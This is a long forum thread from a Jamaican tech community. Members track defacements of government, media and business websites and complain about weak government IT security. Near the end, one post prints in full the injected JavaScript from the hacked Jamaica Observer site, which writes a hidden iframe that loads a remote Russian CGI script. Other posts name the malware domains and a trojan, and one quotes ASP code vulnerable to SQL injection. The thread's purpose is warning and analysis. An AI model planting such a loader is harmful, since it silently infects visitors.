E-Transaction Act and CyberCrime Act aren't enough.

Did some digging again and found more Jamaican websites that have been hacked and defaced recently.

The new victims are :

The Jamaica Theological Seminary and Caribbean Graduate School Of Theology (http://www.jtscgst.edu.jm)
Here's the link to the archived defaced page (http://www.zone-h.org/defacements/mirror/id=1279523/)

The Jamaica Association for the Deaf (http://jamdeaf.org.jm/)
Here's the link to the archived defaced page (http://www.zone-h.org/defacements/mirror/id=1277088/)

Jamaica Producers Group Ltd. (http://www.jpjamaica.com)
Archived Defacement (http://www.zone-h.org/defacements/mirror/id=1279521/)

Oh...the Ministry of Labour website http://www.minlab.gov.jm is still defaced :-\

Oh...the Ministry of Labour website http://www.minlab.gov.jm is still defaced :-\


Come Now Star...someone must can tell dem fi tek it dung...dem just stop use it and nuh de-commison it...Strange ??? ???
i understand that there is move a foot to standerdize goverment based web presence to set standards...i hope the consider security as a significant part od these standards

Come Now Star...someone must can tell dem fi tek it dung...dem just stop use it and nuh de-commison it...Strange ??? ???
i understand that there is move a foot to standerdize goverment based web presence to set standards...i hope the consider security as a significant part od these standards



I think after it was hacked they stopped using that site altogether and has another. I dont know the link though.

I think after it was hacked they stopped using that site altogether and has another. I dont know the link though.

http://www.lmis-ele.org.jm/

Oh thanx Chris

Come Now Star...someone must can tell dem fi tek it dung...dem just stop use it and nuh de-commison it...Strange
i understand that there is move a foot to standerdize goverment based web presence to set standards...i hope the consider security as a significant part od these standards

I used to be on the subcommittee dealing with the implementation of a "govt standard" for websites, however i'm sorry to say that security was the least raised variable in the issue...sad isnt it :( And unfortunately i'm no longer in the island, so i cant make my opinions heard. But i'm sure their are ppl in TechJam that can

I used to be on the subcommittee dealing with the implementation of a "govt standard" for websites, however i'm sorry to say that security was the least raised variable in the issue...sad isnt it :( And unfortunately i'm no longer in the island, so i cant make my opinions heard. But i'm sure their are ppl in TechJam that can


I'm on the committee. What do you want me to say?

I'm on the committee. What do you want me to say?


Gee... where do we start ??? ;)

Seriously though, I think the most beneficial thing is to incorporate planning for security in your development of standards for the websites. You all should examine the various security issues - from secure design, to implementation, to incident handling, and then incorporate these things in all aspects of your decision making. It costs less to incorporate security planning before implementation than dealing with security after things are already set.

The stakes are pretty high when you consider the push govt. has been making about putting govt. services online. We the taxpayers need to be asured that our data and interests are protected when you open up services on the world-wide Internet.

Govt. definitely needs to have a formal Information Security Policy for it's internal operations.

Come Now Star...someone must can tell dem fi tek it dung...dem just stop use it and nuh de-commison it...Strange ??? ???
i understand that there is move a foot to standerdize goverment based web presence to set standards...i hope the consider security as a significant part od these standards



The Ministry of Labour knows about the defaced website. It's been featured on CVM news already. They spun some PR about the Police Cybercrime Unit being on the case...yadda yadda yadda...

The fact that they've launched a new site is all well and good, but when you have links on other websites (including govt. sites) pointing to a link to the Ministry of Labour which turns out to be a defaced website, it just looks plain embarrasing. :-\

IMO.. the Techonlogy ministry needs to (if it has not already done so) to ensure that goverment has standard policy for Information techonlogy (e.g. procument, trainning, website desgin and developement and importantly now security ) I had the opportunity to visit one of the goverment entities of US state where i was given me a tour of there IT infrastructure. Now in 2001 this entity were still using Office 97 and NT workstation and Server and Exchange 5.5 (the had about 2000 user on their network) Well..since the buzz was about win2k and AD i had figuerd they would have been upgrading too...(since is US gov and this entity could actually afford it) They told me that all decisons regarding upgrades or infrastructure changes were taken care at the state IT depratment and if they needed say a new server they had to cordinnate with the state's technolgy office. It might sound like alot of beauracracy, but truth be told it does lead to ordered managment of the infrastructure and resources. I think that the goverment network is not too complex to have some centrality over it. What is the role of FISCAL in all of this. They were once touted as central goverments IT deaparment. Are they only involved on the programming side? Should they get involved on the infrastructure and security side?

BTW how many person have had a read of the governments IT strategic plan? What do you think of it?

The Ministry of Labour is really joking now. Their website http://www.minlab.gov.jm has a new defacement up.

Why don't they just take down the server?

Jokers.

Hey People try this out.
Go to http://www.google.com

Enter the following search terms exactly in the google search:

jamaica ministry of labour

What results do you get back? :eusa_shif

And what if you had used "I'm feeling lucky"?

You should try it for "weapons of mass destruction" in google and press "im feeling lucky" and you'll see how lucky you get.

You should try it for "weapons of mass destruction" in google and press "im feeling lucky" and you'll see how lucky you get.
I know of that one from The Screensavers. It was done deliberately, using dubious methods by persons of questionable morals.

http://www.minlab.gov.jm/....

Hey guys this site is hacked...AGAIN!!.....

http://www.minlab.gov.jm/....

Hey guys this site is hacked...AGAIN!!.....

Breddrin...methinks this site has been designated as a training ground for website defacers because the Ministry of Labour cannot seriously have any intention for really using it. :eusa_snoo

LOL, it appears that the Jamaican Gov't is maintaining a breeding ground for hackers by leaving that site online. I wonder if they have some extra space and bandwidth on it? :eusa_thin

well...boy is how much time this site get hacked? :eusa_thin :eusa_thin

Seriously, Does anyone have any form of assocaiton with the Ministry? Someone needs to offer them some help!

well...boy is how much time this site get hacked? :eusa_thin :eusa_thin

Seriously, Does anyone have any form of assocaiton with the Ministry? Someone needs to offer them some help!

This is one of the problems with Jamaican govt. Even after CVM did a story on this website being defaced, the Ministry of Labour claimed "they had it under control", "the police were investigating" etc. Not a thing has come out of it.

They know it has been defaced. It has never been fixed up or secured. Hence they obviously don't care.

In light of this, any E-govt or E-business effort by the govt. in my view has NO CREDIBILITY. If they don't care enough to keep their ministry website secure, then they won't care enough to secure my personal data. Neither will they care enough to put things in place so that people can be sure that other Jamaican businesses are taking the right measures to secure citizens personal data.

Nuff mouth talking and no serious action yet again. :eusa_snoo

This is one of the problems with Jamaican govt. Even after CVM did a story on this website being defaced, the Ministry of Labour claimed "they had it under control", "the police were investigating" etc. Not a thing has come out of it.

They know it has been defaced. It has never been fixed up or secured. Hence they obviously don't care.

In light of this, any E-govt or E-business effort by the govt. in my view has NO CREDIBILITY. If they don't care enough to keep their ministry website secure, then they won't care enough to secure my personal data. Neither will they care enough to put things in place so that people can be sure that other Jamaican businesses are taking the right measures to secure citizens personal data.

Nuff mouth talking and no serious action yet again. :eusa_snoo

DITTO :eusa_snoo

folks there is not protection on this site.....trust me!1

The things we found out just by doing some checks today ..boy oh boy!

I agree, if they can't secure one website how will they secure my personal info? It appears that there is no "ownership" of things like these when they happen. Ask the police to investigate a hacking incident? PLEASE!! :icon_roll

I agree, if they can't secure one website how will they secure my personal info? It appears that there is no "ownership" of things like these when they happen. Ask the police to investigate a hacking incident? PLEASE!! :icon_roll

Whatever happened to that "Cybercrime Unit"? Where is CITO in all of this? What is the Ministry of Technology doing?

Anyone considered the possibility it is being used as a "honey pot"? :eusa_eh:

Anyone considered the possibility it is being used as a "honey pot"? :eusa_eh:

They wouldn't link to a honeypot on other legitimate websites while proporting to link to a legitimate government website.

This only goes to show the credibility of our esteemed government.

The website http://www.minlab.gov.jm - owned by the Ministry of Labour, has finally been taken offline. This after being hacked and defaced, by who knows how many different persons.

In case you wanted to know what they were running on their site:
http://searchdns.netcraft.com/?host=http%3A%2F%2Fminlab.gov.jm&position=limited&lookup=Wait..

In case you wanted to know what they were running on their site:
http://searchdns.netcraft.com/?host=http%3A%2F%2Fminlab.gov.jm&position=limited&lookup=Wait..

LoL :eusa_doh:

Our beloved government who want's us to pay our taxes online. :eusa_wall

In case you wanted to know what they were running on their site:
http://searchdns.netcraft.com/?host=http%3A%2F%2Fminlab.gov.jm&position=limited&lookup=Wait..

WHAT DA?? ROFL !!! :icon_lol: THIS IS UNBELIEVABLE http://img.photobucket.com/albums/v98/prodmaster/mi_ra.gif

aahhhhh bwoy. first the fake verisign tag, and now win 98? what will they do next, allow ftp and telnet connections?

To be fair... netcraft reports the OS as NT/98... generally it's safe to assume that they're running NT, which is slightly better.

Whatever happened to that "Cybercrime Unit"? Where is CITO in all of this? What is the Ministry of Technology doing?
Maybe they are beginners like me? Only know how to use brains and logic? Nothing about programming? The only cop I know personnally who has extensive knowledge of ICT is in the Mobile Reserve.

Quote:
Originally Posted by BlackCryptoKnight
Whatever happened to that "Cybercrime Unit"? Where is CITO in all of this? What is the Ministry of Technology doing?


Maybe they are beginners like me? Only know how to use brains and logic? Nothing about programming? The only cop I know personnally who has extensive knowledge of ICT is in the Mobile Reserve.


Personally i'd appreciate soem feedback as to the depth of the role the cybercrime unit plays...what their procedures are, and as far as what knowledge the members of this task force has...

If anyone could highlight us, even thru the grapevine, i'd appreciate it.

As for govt servers running NT...well what can you say, money talks and a win2k3 server plus licences aint cheap, so most ministry's wont upgrade until they absolutely must...and not because they dont wish to but because ...well...money talks!, & IT depts are hardly included in that conversation!

The Met service website was defaced.

http://www.metservice.gov.jm/index.html

Zone H has archived it here - http://www.zone-h.org/en/defacements/view/id=2177011/

which spanish speaking techj member can transulate the text they defaced it with?

damn from march 16 and it still defaced even now

another jamaican website hacked..hmm. Yeah, for real march 16 kinda long, y dont they change it? I went to the site www.freetranslation.com and this is what it translated to

Racism em full século XXI?

From abolição gives escravatura we seek or fim gave racism, onde temos uma sociedade sem distinção nem discriminação you give pessoas peels ethnic group, mais or that você acha gave system of quotas for black em universities? Você não acha that ao aderirem to isso is being praticado um I tie of racism? Pois to ask quota splits-itself he gave princípio that são lower go you outros by be black? Ou seja, neste modern world onde vivemos exists I tie of racism maior that adoção of systems of quotas?

remember this is a free translation site so u not going to get the best results. still gibberish

Actually, it's Portugese ;)


WHERE VC KEEP ITS RACISM?

Racism in full century XXI?

Since abolition of the slavery we search the end of racism, where we have a society without distinction nor discrimination of the people for the etnia, more what you find of the system of quotas for blacks in university? You do not find that when adhering to this he is being practised a racism act? Therefore to ask for to share of the principle that is inferior to the others for being black? Or either, in this modern world where we live exists act of bigger racism that of quota adoption systems?

wat language is it in??

is tha message for jamaica? or the world?

gracias senor Chris :)

Actually, it's Portugese ;)
lol..oh, that explains the gibberish

ive noticed since the past two months that local based websites are being attacked by hackers..

the first instance i saw and heard about was over at wheelsjamaica.com when someone mentioned that the local drag racing association website was haxed.. http://www.ndrc.com.jm ..its in the process of bing reconstructed, but it was fully defaced and stuff :eusa_shif

another incident i heard about was a website for a company a bredren of mine works for (local of course). an attempt was made to hack it but fortunately one of the admins saw somethin was wrong and took down the site immidiately... so that was saved

3rd incident i saw just now JAGDYB, a local racing club...well http://www.jagdyb.com/

you look for yourself...

techjamaica admins, system admins..be on the look out for any kind of suspicious traffic :eusa_wall

thaks alot don.. on the watch making backups asap.. this other one got hacked the other day too like 2weeks ago, it was jahkno.com i think.

don, I have moved your post into this thread, since we have noticed this problem going on since 2004.

Ahh yes... it's been a while since I've been in this thread.

Ok. More local defacements.

Ministry of Local Government.
http://www.mlgcd.gov.jm/index.php

http://i41.photobucket.com/albums/e253/blackcryptoknight/mlgcdgov.jpg

http://www.mlge.gov.jm/components/com_peoplebook/kuwait.txt

http://i41.photobucket.com/albums/e253/blackcryptoknight/mlgegov.jpg

Check out the list on Zone-H.org (http://www.zone-h.org/index.php?option=com_attacks&Itemid=43&filter=1)

Government can't keep dem tings under control? Zone-H says these sites been defaced since July 9 and July 25.

don, I have moved your post into this thread, since we have noticed this problem going on since 2004.

wow..its been going on that long?

yikes

How comes none of those sites were posted on zone-h? He's only going after small websites... the ones that'll less likely spend resources trying to track him down.

The Ministry of Local Government site has been a victim for over two years!!!!

Desperately need security ...

The Ministry of Local Government site has been a victim for over two years!!!!

Desperately need security ...
Let's be serious, do you see how some of these government websites look, they definately did nto spend time and money to build them let alone secure them.

Let's be serious, do you see how some of these government websites look, they definately did nto spend time and money to build them let alone secure them.

I also believe this, most of the government sites look like a 6 year old build them

i second that fo real serious thing man i have seen a few gov sites if not all not impressive

OWNAGE :D

Brilliance :eusa_clap

They better keep updating there servers lol cause it look like that was a exploit.

Take a look at HEART Trust/NTA (http://toolbar.netcraft.com/site_report?url=http://www.heart-nta.org). They seem very secure to me. It seems it's what the government is paying most attention to that is failing. All this focus on the Vani Ts taking them away from the important stuff. [Vani Ts = tourism (government shouldn't be sustaining tourism, should sustain itself), tax (they must be getting enough revenue if them raising them pay again), terrorism (them getting this because them too corrupt!), u certainly can find more to add to the list]

And another point of observation: Flow hosting them!

Addendum
----------
I may be wrong. What does this code do:

<% @ Language="VBScript" %>
<% Response.Buffer=True %>

database code removed

<%
Dim objCon, objRS, idnum
idnum = 0
Set objCon = Server.CreateObject("ADODB.Connection")
Set objRS = Server.CreateObject("ADODB.Recordset")
objCon.Open admin
objRS.Open "SELECT id_num FROM total_users", objCon
If Not objRS.EOF Then
While Not objRS.EOF
idnum = objRS("id_num")
objRS.MoveNext
Wend
idnum = Cint(idnum) + 1
End If
objRS.Close
objRS.Open "SELECT total_hits, id_num FROM total_users WHERE log_date = '" & DateValue(Now) & "'", objCon
If objRS.EOF Then
objRS.Close
objCon.Execute "INSERT INTO total_users VALUES ('" & DateValue(Now) & "', 1, " & idnum & ")"
Else
hits = objRS("total_hits")
objCon.Execute "UPDATE total_users SET total_hits = " & Cint(objRS("total_hits")) + 1 & " WHERE log_date = '" & DateValue(Now) & "'"
objRS.Close
objRS.Open "SELECT log_date FROM total_users WHERE id_num = " & idnum - 1, objCon
If Not objRS("log_date") = DateValue(Now) Then
objCon.Execute "INSERT INTO total_users VALUES ('" & DateValue(Now) & "', " & hits & ", " & idnum & ")"
End If
objRS.Close
End If
Set objRS = Nothing
Set objCon = Nothing


%>Found it here link removed

Carey, that piece of code contains there password and username to there database. I would suggest instead of posting that info on a public forum, that you find a way to contact them about it.

I have removed the url and the database details from your post.

EDIT: It seems the database info is displayed all over the site. Geez. What's wrong with these people?

Carey, that piece of code contains there password and username to there database. I would suggest instead of posting that info on a public forum, that you find a way to contact them about it.

I have removed the url and the database details from your post.

EDIT: It seems the database info is displayed all over the site. Geez. What's wrong with these people?Thanks. Just learning about servers and database myself. Sometimes it's HEART students who develop some things.

Notice that it's defaults they use also.

Thanks. Just learning about servers and database myself. Sometimes it's HEART students who develop some things.

Notice that it's defaults they use also.I figure if anyone is maintaining the site, they would have noticed it by now. Because all you need to do is, after you enter from the front page, you see the database details on the home page and other subsequent pages.

Can't find any contact details on the site or on Heart's site. Why do so many websites lack contact details? :eusa_wall I mean, even a webmaster email would be adequate.

Someone be a good samaritan and contact them please? I can't make out any calls on this line, and rain just start fall and I don't have a driver's license so I can't buy credit!

I was just informed by sandor that the www.jarealty.com (207.21.234.149) website has been hacked. He also pointed out that the JCS' old website (207.21.234.152) has also been hacked. The hacked sites have the same page with the heading &quot;Command Tribulation - Hacking for Jesus - Ownz with Style&quot;. Subsequent checks by me also revealed that www.jamaicaobserver.com (207.21.234.171) was similarly hacked with the same page.

Ok, the list continues ...
www.orcjamaica.com (207.21.234.228) - Office of the Registrar of companies
www.pioj.gov.jm (207.21.234.162) - Planning Institute of Jamaica
www.ugli.com (207.21.234.168)
www.tpdco.org (207.21.234.167) - Tourism Product Development Company
www.jis.gov.jm (207.21.234.181) - Jamaica Information Service
www.infochange.com (207.21.234.129) - Info Exchange (Web Developers)
www.amchamjamaica.org (207.21.234.133) - American Chamber of Commerce
www.jcc.org.jm (207.21.234.151) - Jamaica Chamber of Commerce
www.aaj.com.jm (207.21.234.131) - Airports Authority of Jamaica
www.bigga.com (207.21.234.135) - Bigga soft drinks
www.manley-airport.com.jm (207.21.234.157) - Manley Airport
www.ugigroup.com (207.21.234.176) - UGI group of companies
www.moore.com.jm (207.21.234.174) - Moore business forms
www.cariboutpost.com (207.21.234.138)
www.hawkeye.com.jm (207.21.234.145) - Hawkeye security
www.jamaicancoffee.gov.jm


Based on my knowledge of some of the sites, the common factor is that they were developed, and probably hosted, by Info Exchange Ltd. ???

By the time many of you read this the sites will have been fixed, so here's a screen shot of the page ... http://www.techjamaica.com/images/hacked_page.jpg


add jagdyb.com to the list...

Did anyone notice all those sites IPs start with 207.21.234...?

all jamaican sites do

all jamaican sites do

Actually no. Not all jamaican sites do.

I came across the hacked site of the Department of Management Studies at UWI Mona. The joke is that they changed the headlines of all the news items except the one that was titled "security" :eusa_thin.

http://img.photobucket.com/albums/v405/juggler111/images/UWIMona_DOMS_hacked-2007-01-09.gif

I reserved posting this until I was able to get this information to relevant persons in the Department so that they could take the necessary recovery steps. They have since removed the hacked headlines, but haven't replaced them with the correct ones as yet.

According to Zone-H.org (http://www.zone-h.org) which tracks website defacements, there were at least 13 Jamaican websites (within the .jm domain) that were hacked and defaced. Among them were
www.Hawkeye.com.jm
news.ncu.edu.jm
manchesterpc.gov.jm
clarendonpc.gov.jm
mlgcd.gov.jm
ndrc.com.jm and
forrestry.gov.jm


What will 2007 bring?

Edit: Ok, 2007 brings UWI getting hacked.

UWI get hacked regular, i remeber when they launched the updated site and got hacked the same day..........all the links pointed to some porn sites......

add jagdyb.com to the list...You mean since August last year, no one at jagdyb.com has removed the hacked page or anything? :thumbsdown: http://jagdyb.com/forum/

no they were just hacked again, it was working up to last week

many other sites have been hacked this week as well,

even my personal company domain, after i checked it out, they hacked all the sites on the same server. I blame myself for not checking the settings but apparently the hosting provider leaves on anonymous ftp by default, that truly upset me, I thought all these things are turned off by default, oh well, never again.

Don't know if this was mentioned newhere else, but the national land agency website has been hacked. http://www.nla.gov.jm instead of showing its proper page, its now being redirected to an idle animation

Why do I have the feeling that is Blindz do it?

me.....if it was me who did it I wud have redirected it to something more ermmm.... yeah

To see what the hacked sites looked like, use http://www.archive.org/web/web.php

scary what people do

One thing I dont get, what's the point of spoofing these low-level websites, if these Brazillian's or whateva were any good redirect NASA or CIA homepage...

One thing I dont get, what's the point of spoofing these low-level websites, if these Brazillian's or whateva were any good redirect NASA or CIA homepage...

Why such low level sites? Hackers look for security flaws in sites, sometimes it's hard to find a website that has not been patched or secured. also attacks on smaller government sites has taken place in the past by former workers (IT workers, etc.)

Low level sites sometimes have low level security making it easy to hijack the site and recode it or redirect it.

One thing I dont get, what's the point of spoofing these low-level websites, if these Brazillian's or whateva were any good redirect NASA or CIA homepage...
Think...because those sites will get you tracked down and prosecuted.

Alot more are probably hacked but just not announced...so maybe someone has ur personal data

Alot more are probably hacked but just not announced...so maybe someone has ur personal dataI seriously doubt that many (if any) Jamaican websites that have been hacked contained any personal data, and if they did then it's probably nothing more than names and email addresses.

I seriously doubt that many (if any) Jamaican websites that have been hacked contained any personal data, and if they did then it's probably nothing more than names and email addresses.

you would be surprised u kno chris, found a flaw once on a local bank's website that had a little more than that, and even after alerting them about it and meeting with them they still havent fixed it, imagine that!

you would be surprised u kno chris, found a flaw once on a local bank's website that had a little more than that, and even after alerting them about it and meeting with them they still havent fixed it, imagine that!oooooookay then .... I hope I'm not a customer of that bank :eusa_hand

The Jamaica Observer seems to have been hacked...again.
Doesn't seem to have done a whole lot of defacing from what I can see (or maybe it was in the middle of doing the defacing) but getting errors on the cartoon page. And also the Related Links script at the bottom of each news article is showing the following text:

hacked by ADANALI - GeCeCi ( TurkStorm - NetDevilz )

The hacker seems to be trying to get the following javascript to load on the site:
http://www.jvke.ru/ngg.js

Does the Observer webmaster need someone to look over their ASP scripts for potential vulnerabilities? Because this is getting too frequent.

http://i41.photobucket.com/albums/e253/blackcryptoknight/observerhacked1.jpg

http://i41.photobucket.com/albums/e253/blackcryptoknight/observerhacked2.jpg

http://i41.photobucket.com/albums/e253/blackcryptoknight/firefoxnoscript.jpg

Imagine if someone set this thing up to infect visitors with malware? Thank God for Firefox and the NoScript extension.

Wierd. My mouse and firefox seems to be messed up after visiting the Observer webpage. Every link now opens in a new window in firefox, instead of the same window. My scroll window now acts as a left click. Using Opera right now instead.

If my computer got messed up from Observer's website being hacked, I am going to be peeved at their webmaster for not keeping the website more secure.

Thank God for Kaspersky. That site is so hacked and full of malicious script. I thought I was going to be the first one to post but I missed it by an hour. Whappen you guys don't sleep :). Has someone called to inform them because who knows what that malware does to your machine.


detected: virus Net-Worm.JS.Aspxor.a URL:http://www.jvke.ru/ngg.js

Well as title states.

http://img396.imageshack.us/img396/2469/observerhack2qw9.jpg (http://imageshack.us)
http://img396.imageshack.us/img396/2469/observerhack2qw9.8379bb94b3.jpg (http://g.imageshack.us/g.php?h=396&i=observerhack2qw9.jpg)
http://img73.imageshack.us/img73/6428/observerhackedfq1.jpg (http://imageshack.us)
http://img73.imageshack.us/img73/6428/observerhackedfq1.0da6380298.jpg (http://g.imageshack.us/g.php?h=73&i=observerhackedfq1.jpg)

just the images and related articles? meh its not so bad

just the images and related articles? meh its not so bad
Hacked nonetheless. From what I am seeing, this is obviously sql injection. These Netdevilz guys are pros. They hacked the photobucket and ICANN sites in the past. And they are Turkish. I wonder what they get hacking a site like The Observer.

i wonder when we get so big to now be the target of hackers ??:eusa_thin:eusa_thin. This should be a warning to other local websites that security should be high on their agenda.

I wonder why they would do that? ? ?

Hacked nonetheless. From what I am seeing, this is obviously sql injection. These Netdevilz guys are pros. They hacked the photobucket and ICANN sites in the past. And they are Turkish. I wonder what they get hacking a site like The Observer.

Because they can.. Whether any harm was done or not. being hacked is a breach of security, shows up observer

up to time of this post still there

I wouldn't click any of those links they have in the related articles section as they point to some java scripts and we don't know what they'll do on your machine.

LoL hackers are loose never thought i would see these things so rampant in ja.

Well, Google has now blocked me from going to the Observer website....
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://www.jamaicaobserver.com/

Reported Attack Site!

This web site at www.jamaicaobserver.com has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.


Safe Browsing
Diagnostic page for www.jamaicaobserver.com/

What is the current listing status for www.jamaicaobserver.com/?

Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?

Of the 91 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 07/23/2008, and the last time suspicious content was found on this site was on 07/23/2008.

Malicious software is hosted on 3 domain(s), including 78.109.30.0, gb53.ru, jvke.ru.

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, www.jamaicaobserver.com/ did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

* Return to the previous page.
* If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

For those interested, this was the contents of the ngg.js javascript file the hacker tried to load on the Observer page:
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("vrcgoo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "vrcgoo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://4cnw.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}Seems it tries to set a cookie on persons computers and also load a CGI script.

scripts for the win !!!

or not ...in this case :eusa_doh:

I dunno but the bright side of things is that you are kept on your toes with regards to security (well should be).

scripts for the win !!!

or not ...in this case :eusa_doh:

I dunno but the bright side of things is that you are kept on your toes with regards to security (well should be).Well, can't do much if you visit your favourite and trusted site (like the Observer) and then find out it's hacked and that the hacker uses a vulnerability in your browser that he has not published, that loads a script that does damage to your pc.

No matter how much toes you stay on, can't do much in that regards.

Well, can't do much if you visit your favourite and trusted site (like the Observer) and then find out it's hacked and that the hacker uses a vulnerability in your browser that he has not published, that loads a script that does damage to your pc.

No matter how much toes you stay on, can't do much in that regards.

.... disable scripts ...or turn on prompting .... :sold:
Always a way man...

.... disable scripts ...or turn on prompting .... :sold:
Always a way man...tronyx, disabling javascript would be like surfing the web in text. Just using most of this forum functionality requires javascript. LOTS of sites require javascript. Do you surf with javascript disabled?

The NoScript extension for firefox as BCK pointed out would be the safer way to avoid sites that get hacked and insert javascript from 3rd party sites. I might just look into installing it, since 1 of my favorite sites are getting hacked more than once in a short time. :eusa_wall

No no ....im not saying you should, i did also mention enabling the prompt so you see exactly what you're allowing to take refuge on your pc.
See, majority of users say "Yes" to everything that pops up because they just "wanna get on with it", but the handful, that take precautions fare better more while.

There is also a feature in browsers where it can prompt you once the first time you visit a site.
Say you went to observer and accepted the cert and javascripts a few weeks back, then this new malicious code prompted you out of the blue today, spending that half minute more to examine whats what can make a difference.

Just...an... idea...

No no ....im not saying you should, i did also mention enabling the prompt so you see exactly what you're allowing to take refuge on your pc.
See, majority of users say "Yes" to everything that pops up because they just "wanna get on with it", but the handful, that take precautions fare better more while.

There is also a feature in browsers where it can prompt you once the first time you visit a site.
Say you went to observer and accepted the cert and javascripts a few weeks back, then this new malicious code prompted you out of the blue today, spending that half minute more to examine whats what can make a difference.

Just...an... idea...What prompt you talking tron? Firefox doesn't prompt you if you want to allow a website to use javascript. Or are you talking about another browser? :eusa_thin

Interesting script seems to exclude Russian and Chinese users..
Any word from observer officials?

Wonder whats here.. h..p://4cnw.ru/cgi-bin/index.cgi?ad

The Jamaica Observer seems to have been hacked...again.
Doesn't seem to have done a whole lot of defacing from what I can see (or maybe it was in the middle of doing the defacing) but getting errors on the cartoon page. And also the Related Links script at the bottom of each news article is showing the following text:

hacked by ADANALI - GeCeCi ( TurkStorm - NetDevilz )

The hacker seems to be trying to get the following javascript to load on the site:
http://www.jvke.ru/ngg.js

Does the Observer webmaster need someone to look over their ASP scripts for potential vulnerabilities? Because this is getting too frequent.

lol send in your resume. They seem to need the help. ;)

The website is now up

The website is now up
With FF3 the damage is much greater, since FF3 now blocks users from accessing the site, because Google has marked the site as dangerous.

Hope the webmasters have went ahead and cleared the issue with Google. Need to login to Webmaster Tools https://www.google.com/webmasters/tools and send the site in for reconsideration, so they can evaluate the site again.

Otherwise, Observer might be blocked for a good while. :(

The Jamaica Observer's webpage was hacked again. Please stay AWAY!!!!

The site attempts to load snapview.ocx then downloads rondll32.exe to a temporary location:C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\IX6UY2KZ\rondll32[1].exe

Trojan program: Backdoor.Win32.Small.flb

The Jamaica Observer's webpage was hacked again. Please stay AWAY!!!!

The site attempts to download a load snapview.ocx then downloads rondll32.ext to a temporary location:C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\IX6UY2KZ\rondll32[1].exe

Trojan program: Backdoor.Win32.Small.flb

lol whats there problem with this site i wonder what did they do to those persons?

The Jamaica Observer's webpage was hacked again. Please stay AWAY!!!!

The site attempts to load snapview.ocx then downloads rondll32.exe to a temporary location:C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\IX6UY2KZ\rondll32[1].exe

Trojan program: Backdoor.Win32.Small.flb

This just shows up how unsecured some of our websites are. I wonder if the banking websites are fretting...:icon_eek:

lol whats there problem with this site i wonder what did they do to those persons?

Maybe its just one of the easier sites to hack and plus the site has consistent traffic so I guess it makes a very attractive victim. Or maybe someone just has a bone to pick with the Observer and wants to make life real difficult for the company.

Maybe its just one of the easier sites to hack and plus the site has consistent traffic so I guess it makes a very attractive victim. Or maybe someone just has a bone to pick with the Observer and wants to make life real difficult for the company.

Well i guess this is where those who participated in the Computer Forensic course at Utech will come in handy

Looks like Observer was hacked again this morning. This is crazy and absolutely ridiculous.

Hack me once, shame on you, hack me twice, shame on me. Hack me 3 times... :eusa_wall

The Observer has been advertising for an IT Manager over the past few weeks. I wonder if the hacks are coming from Jamaica? hmmmm

Well Firefox 3.0 had Jamaica Oberserver's site blocked for about a week and everytime I tried to check it I got either a error message or a security vulnerability prompt about the site. The only thing I can say is that sometimes you get what you paid for still but as KING said they are looking for an IT Manager so that could be but one of the sites' many problems why they are being attacked this aggressively.

What's the deal with the JamaicaObserver Website??

http://i5.photobucket.com/albums/y154/nder_jm/jamaicaobserver.jpg

Same thing that happened before.
One or more of their pages were probably compromised and Google picked up on it.
The entire site wud then be initially blocked.

It looks like Observer has been hit, one...more...time.
Particularly on this web page: http://www.jamaicaobserver.com/magazines/Business/html/20090423T030000-0500_150057_OBS_CARLOS_SLIM_HAS_NOT_ACQUIRED_FLOW_ .asp

It is loading a flash file from a site bin.clearspring.com. Site is registered by someone in China. Not sure what the flash file is doing but hope it is not using a flash exploit.

darn it :eusa_wall i just read that article prior to coming to TJ... oops. Gonna get myself fully scanned

It looks like Observer has been hit, one...more...time.
Particularly on this web page: http://www.jamaicaobserver.com/magazines/Business/html/20090423T030000-0500_150057_OBS_CARLOS_SLIM_HAS_NOT_ACQUIRED_FLOW_ .asp

It is loading a flash file from a site bin.clearspring.com. Site is registered by someone in China. Not sure what the flash file is doing but hope it is not using a flash exploit.

I really dont get what that flash file is doing either... :eusa_wall

But observer seems to be easy target

Clearspring is a site that creates widgets. They make the widget that you see on most sites beside the "Share this" sign.

Clearspring is a site that creates widgets. They make the widget that you see on most sites beside the "Share this" sign.Ahh gotcha. Found the flash file within the javascript file from the addthis.com service that is owned by clearspring.

I don't know if it supposed to be apart of the Share This feature because the script doesn't use flash.

I just realized I did a whois look up on the wrong domain. It looked up clearsping.com (without the R in spring) instead of clearspring.com. :eusa_wall

Apart from the odd flash file embedded in the page directly from clearspring.com site (instead of addthis.com) and the hugely out of portioned picture on that article page, the page is ok.

Seems very fishy to me. :eusa_thin

If you open the picture on another tab you will see it proportioned properly. It looks like an sizing error on the site's part

If you open the picture on another tab you will see it proportioned properly. It looks like an sizing error on the site's partI know ramesh, but if it was just a large oversized picture, I wouldn't have made an alarm. But seeing a hidden flash file embedded from a 3rd party site that seems to have no place on this site, raised suspicions for me.

Anyways, I finally got in contact with the observer webmaster and he fixed it.

Now which Idiot hacked this site for what purpose?

http://www.rada.gov.jm/rada_library.php

Now I need infor and cannot get it....Idle people seriously

lol. oh boy.......... look like them nuh realise!

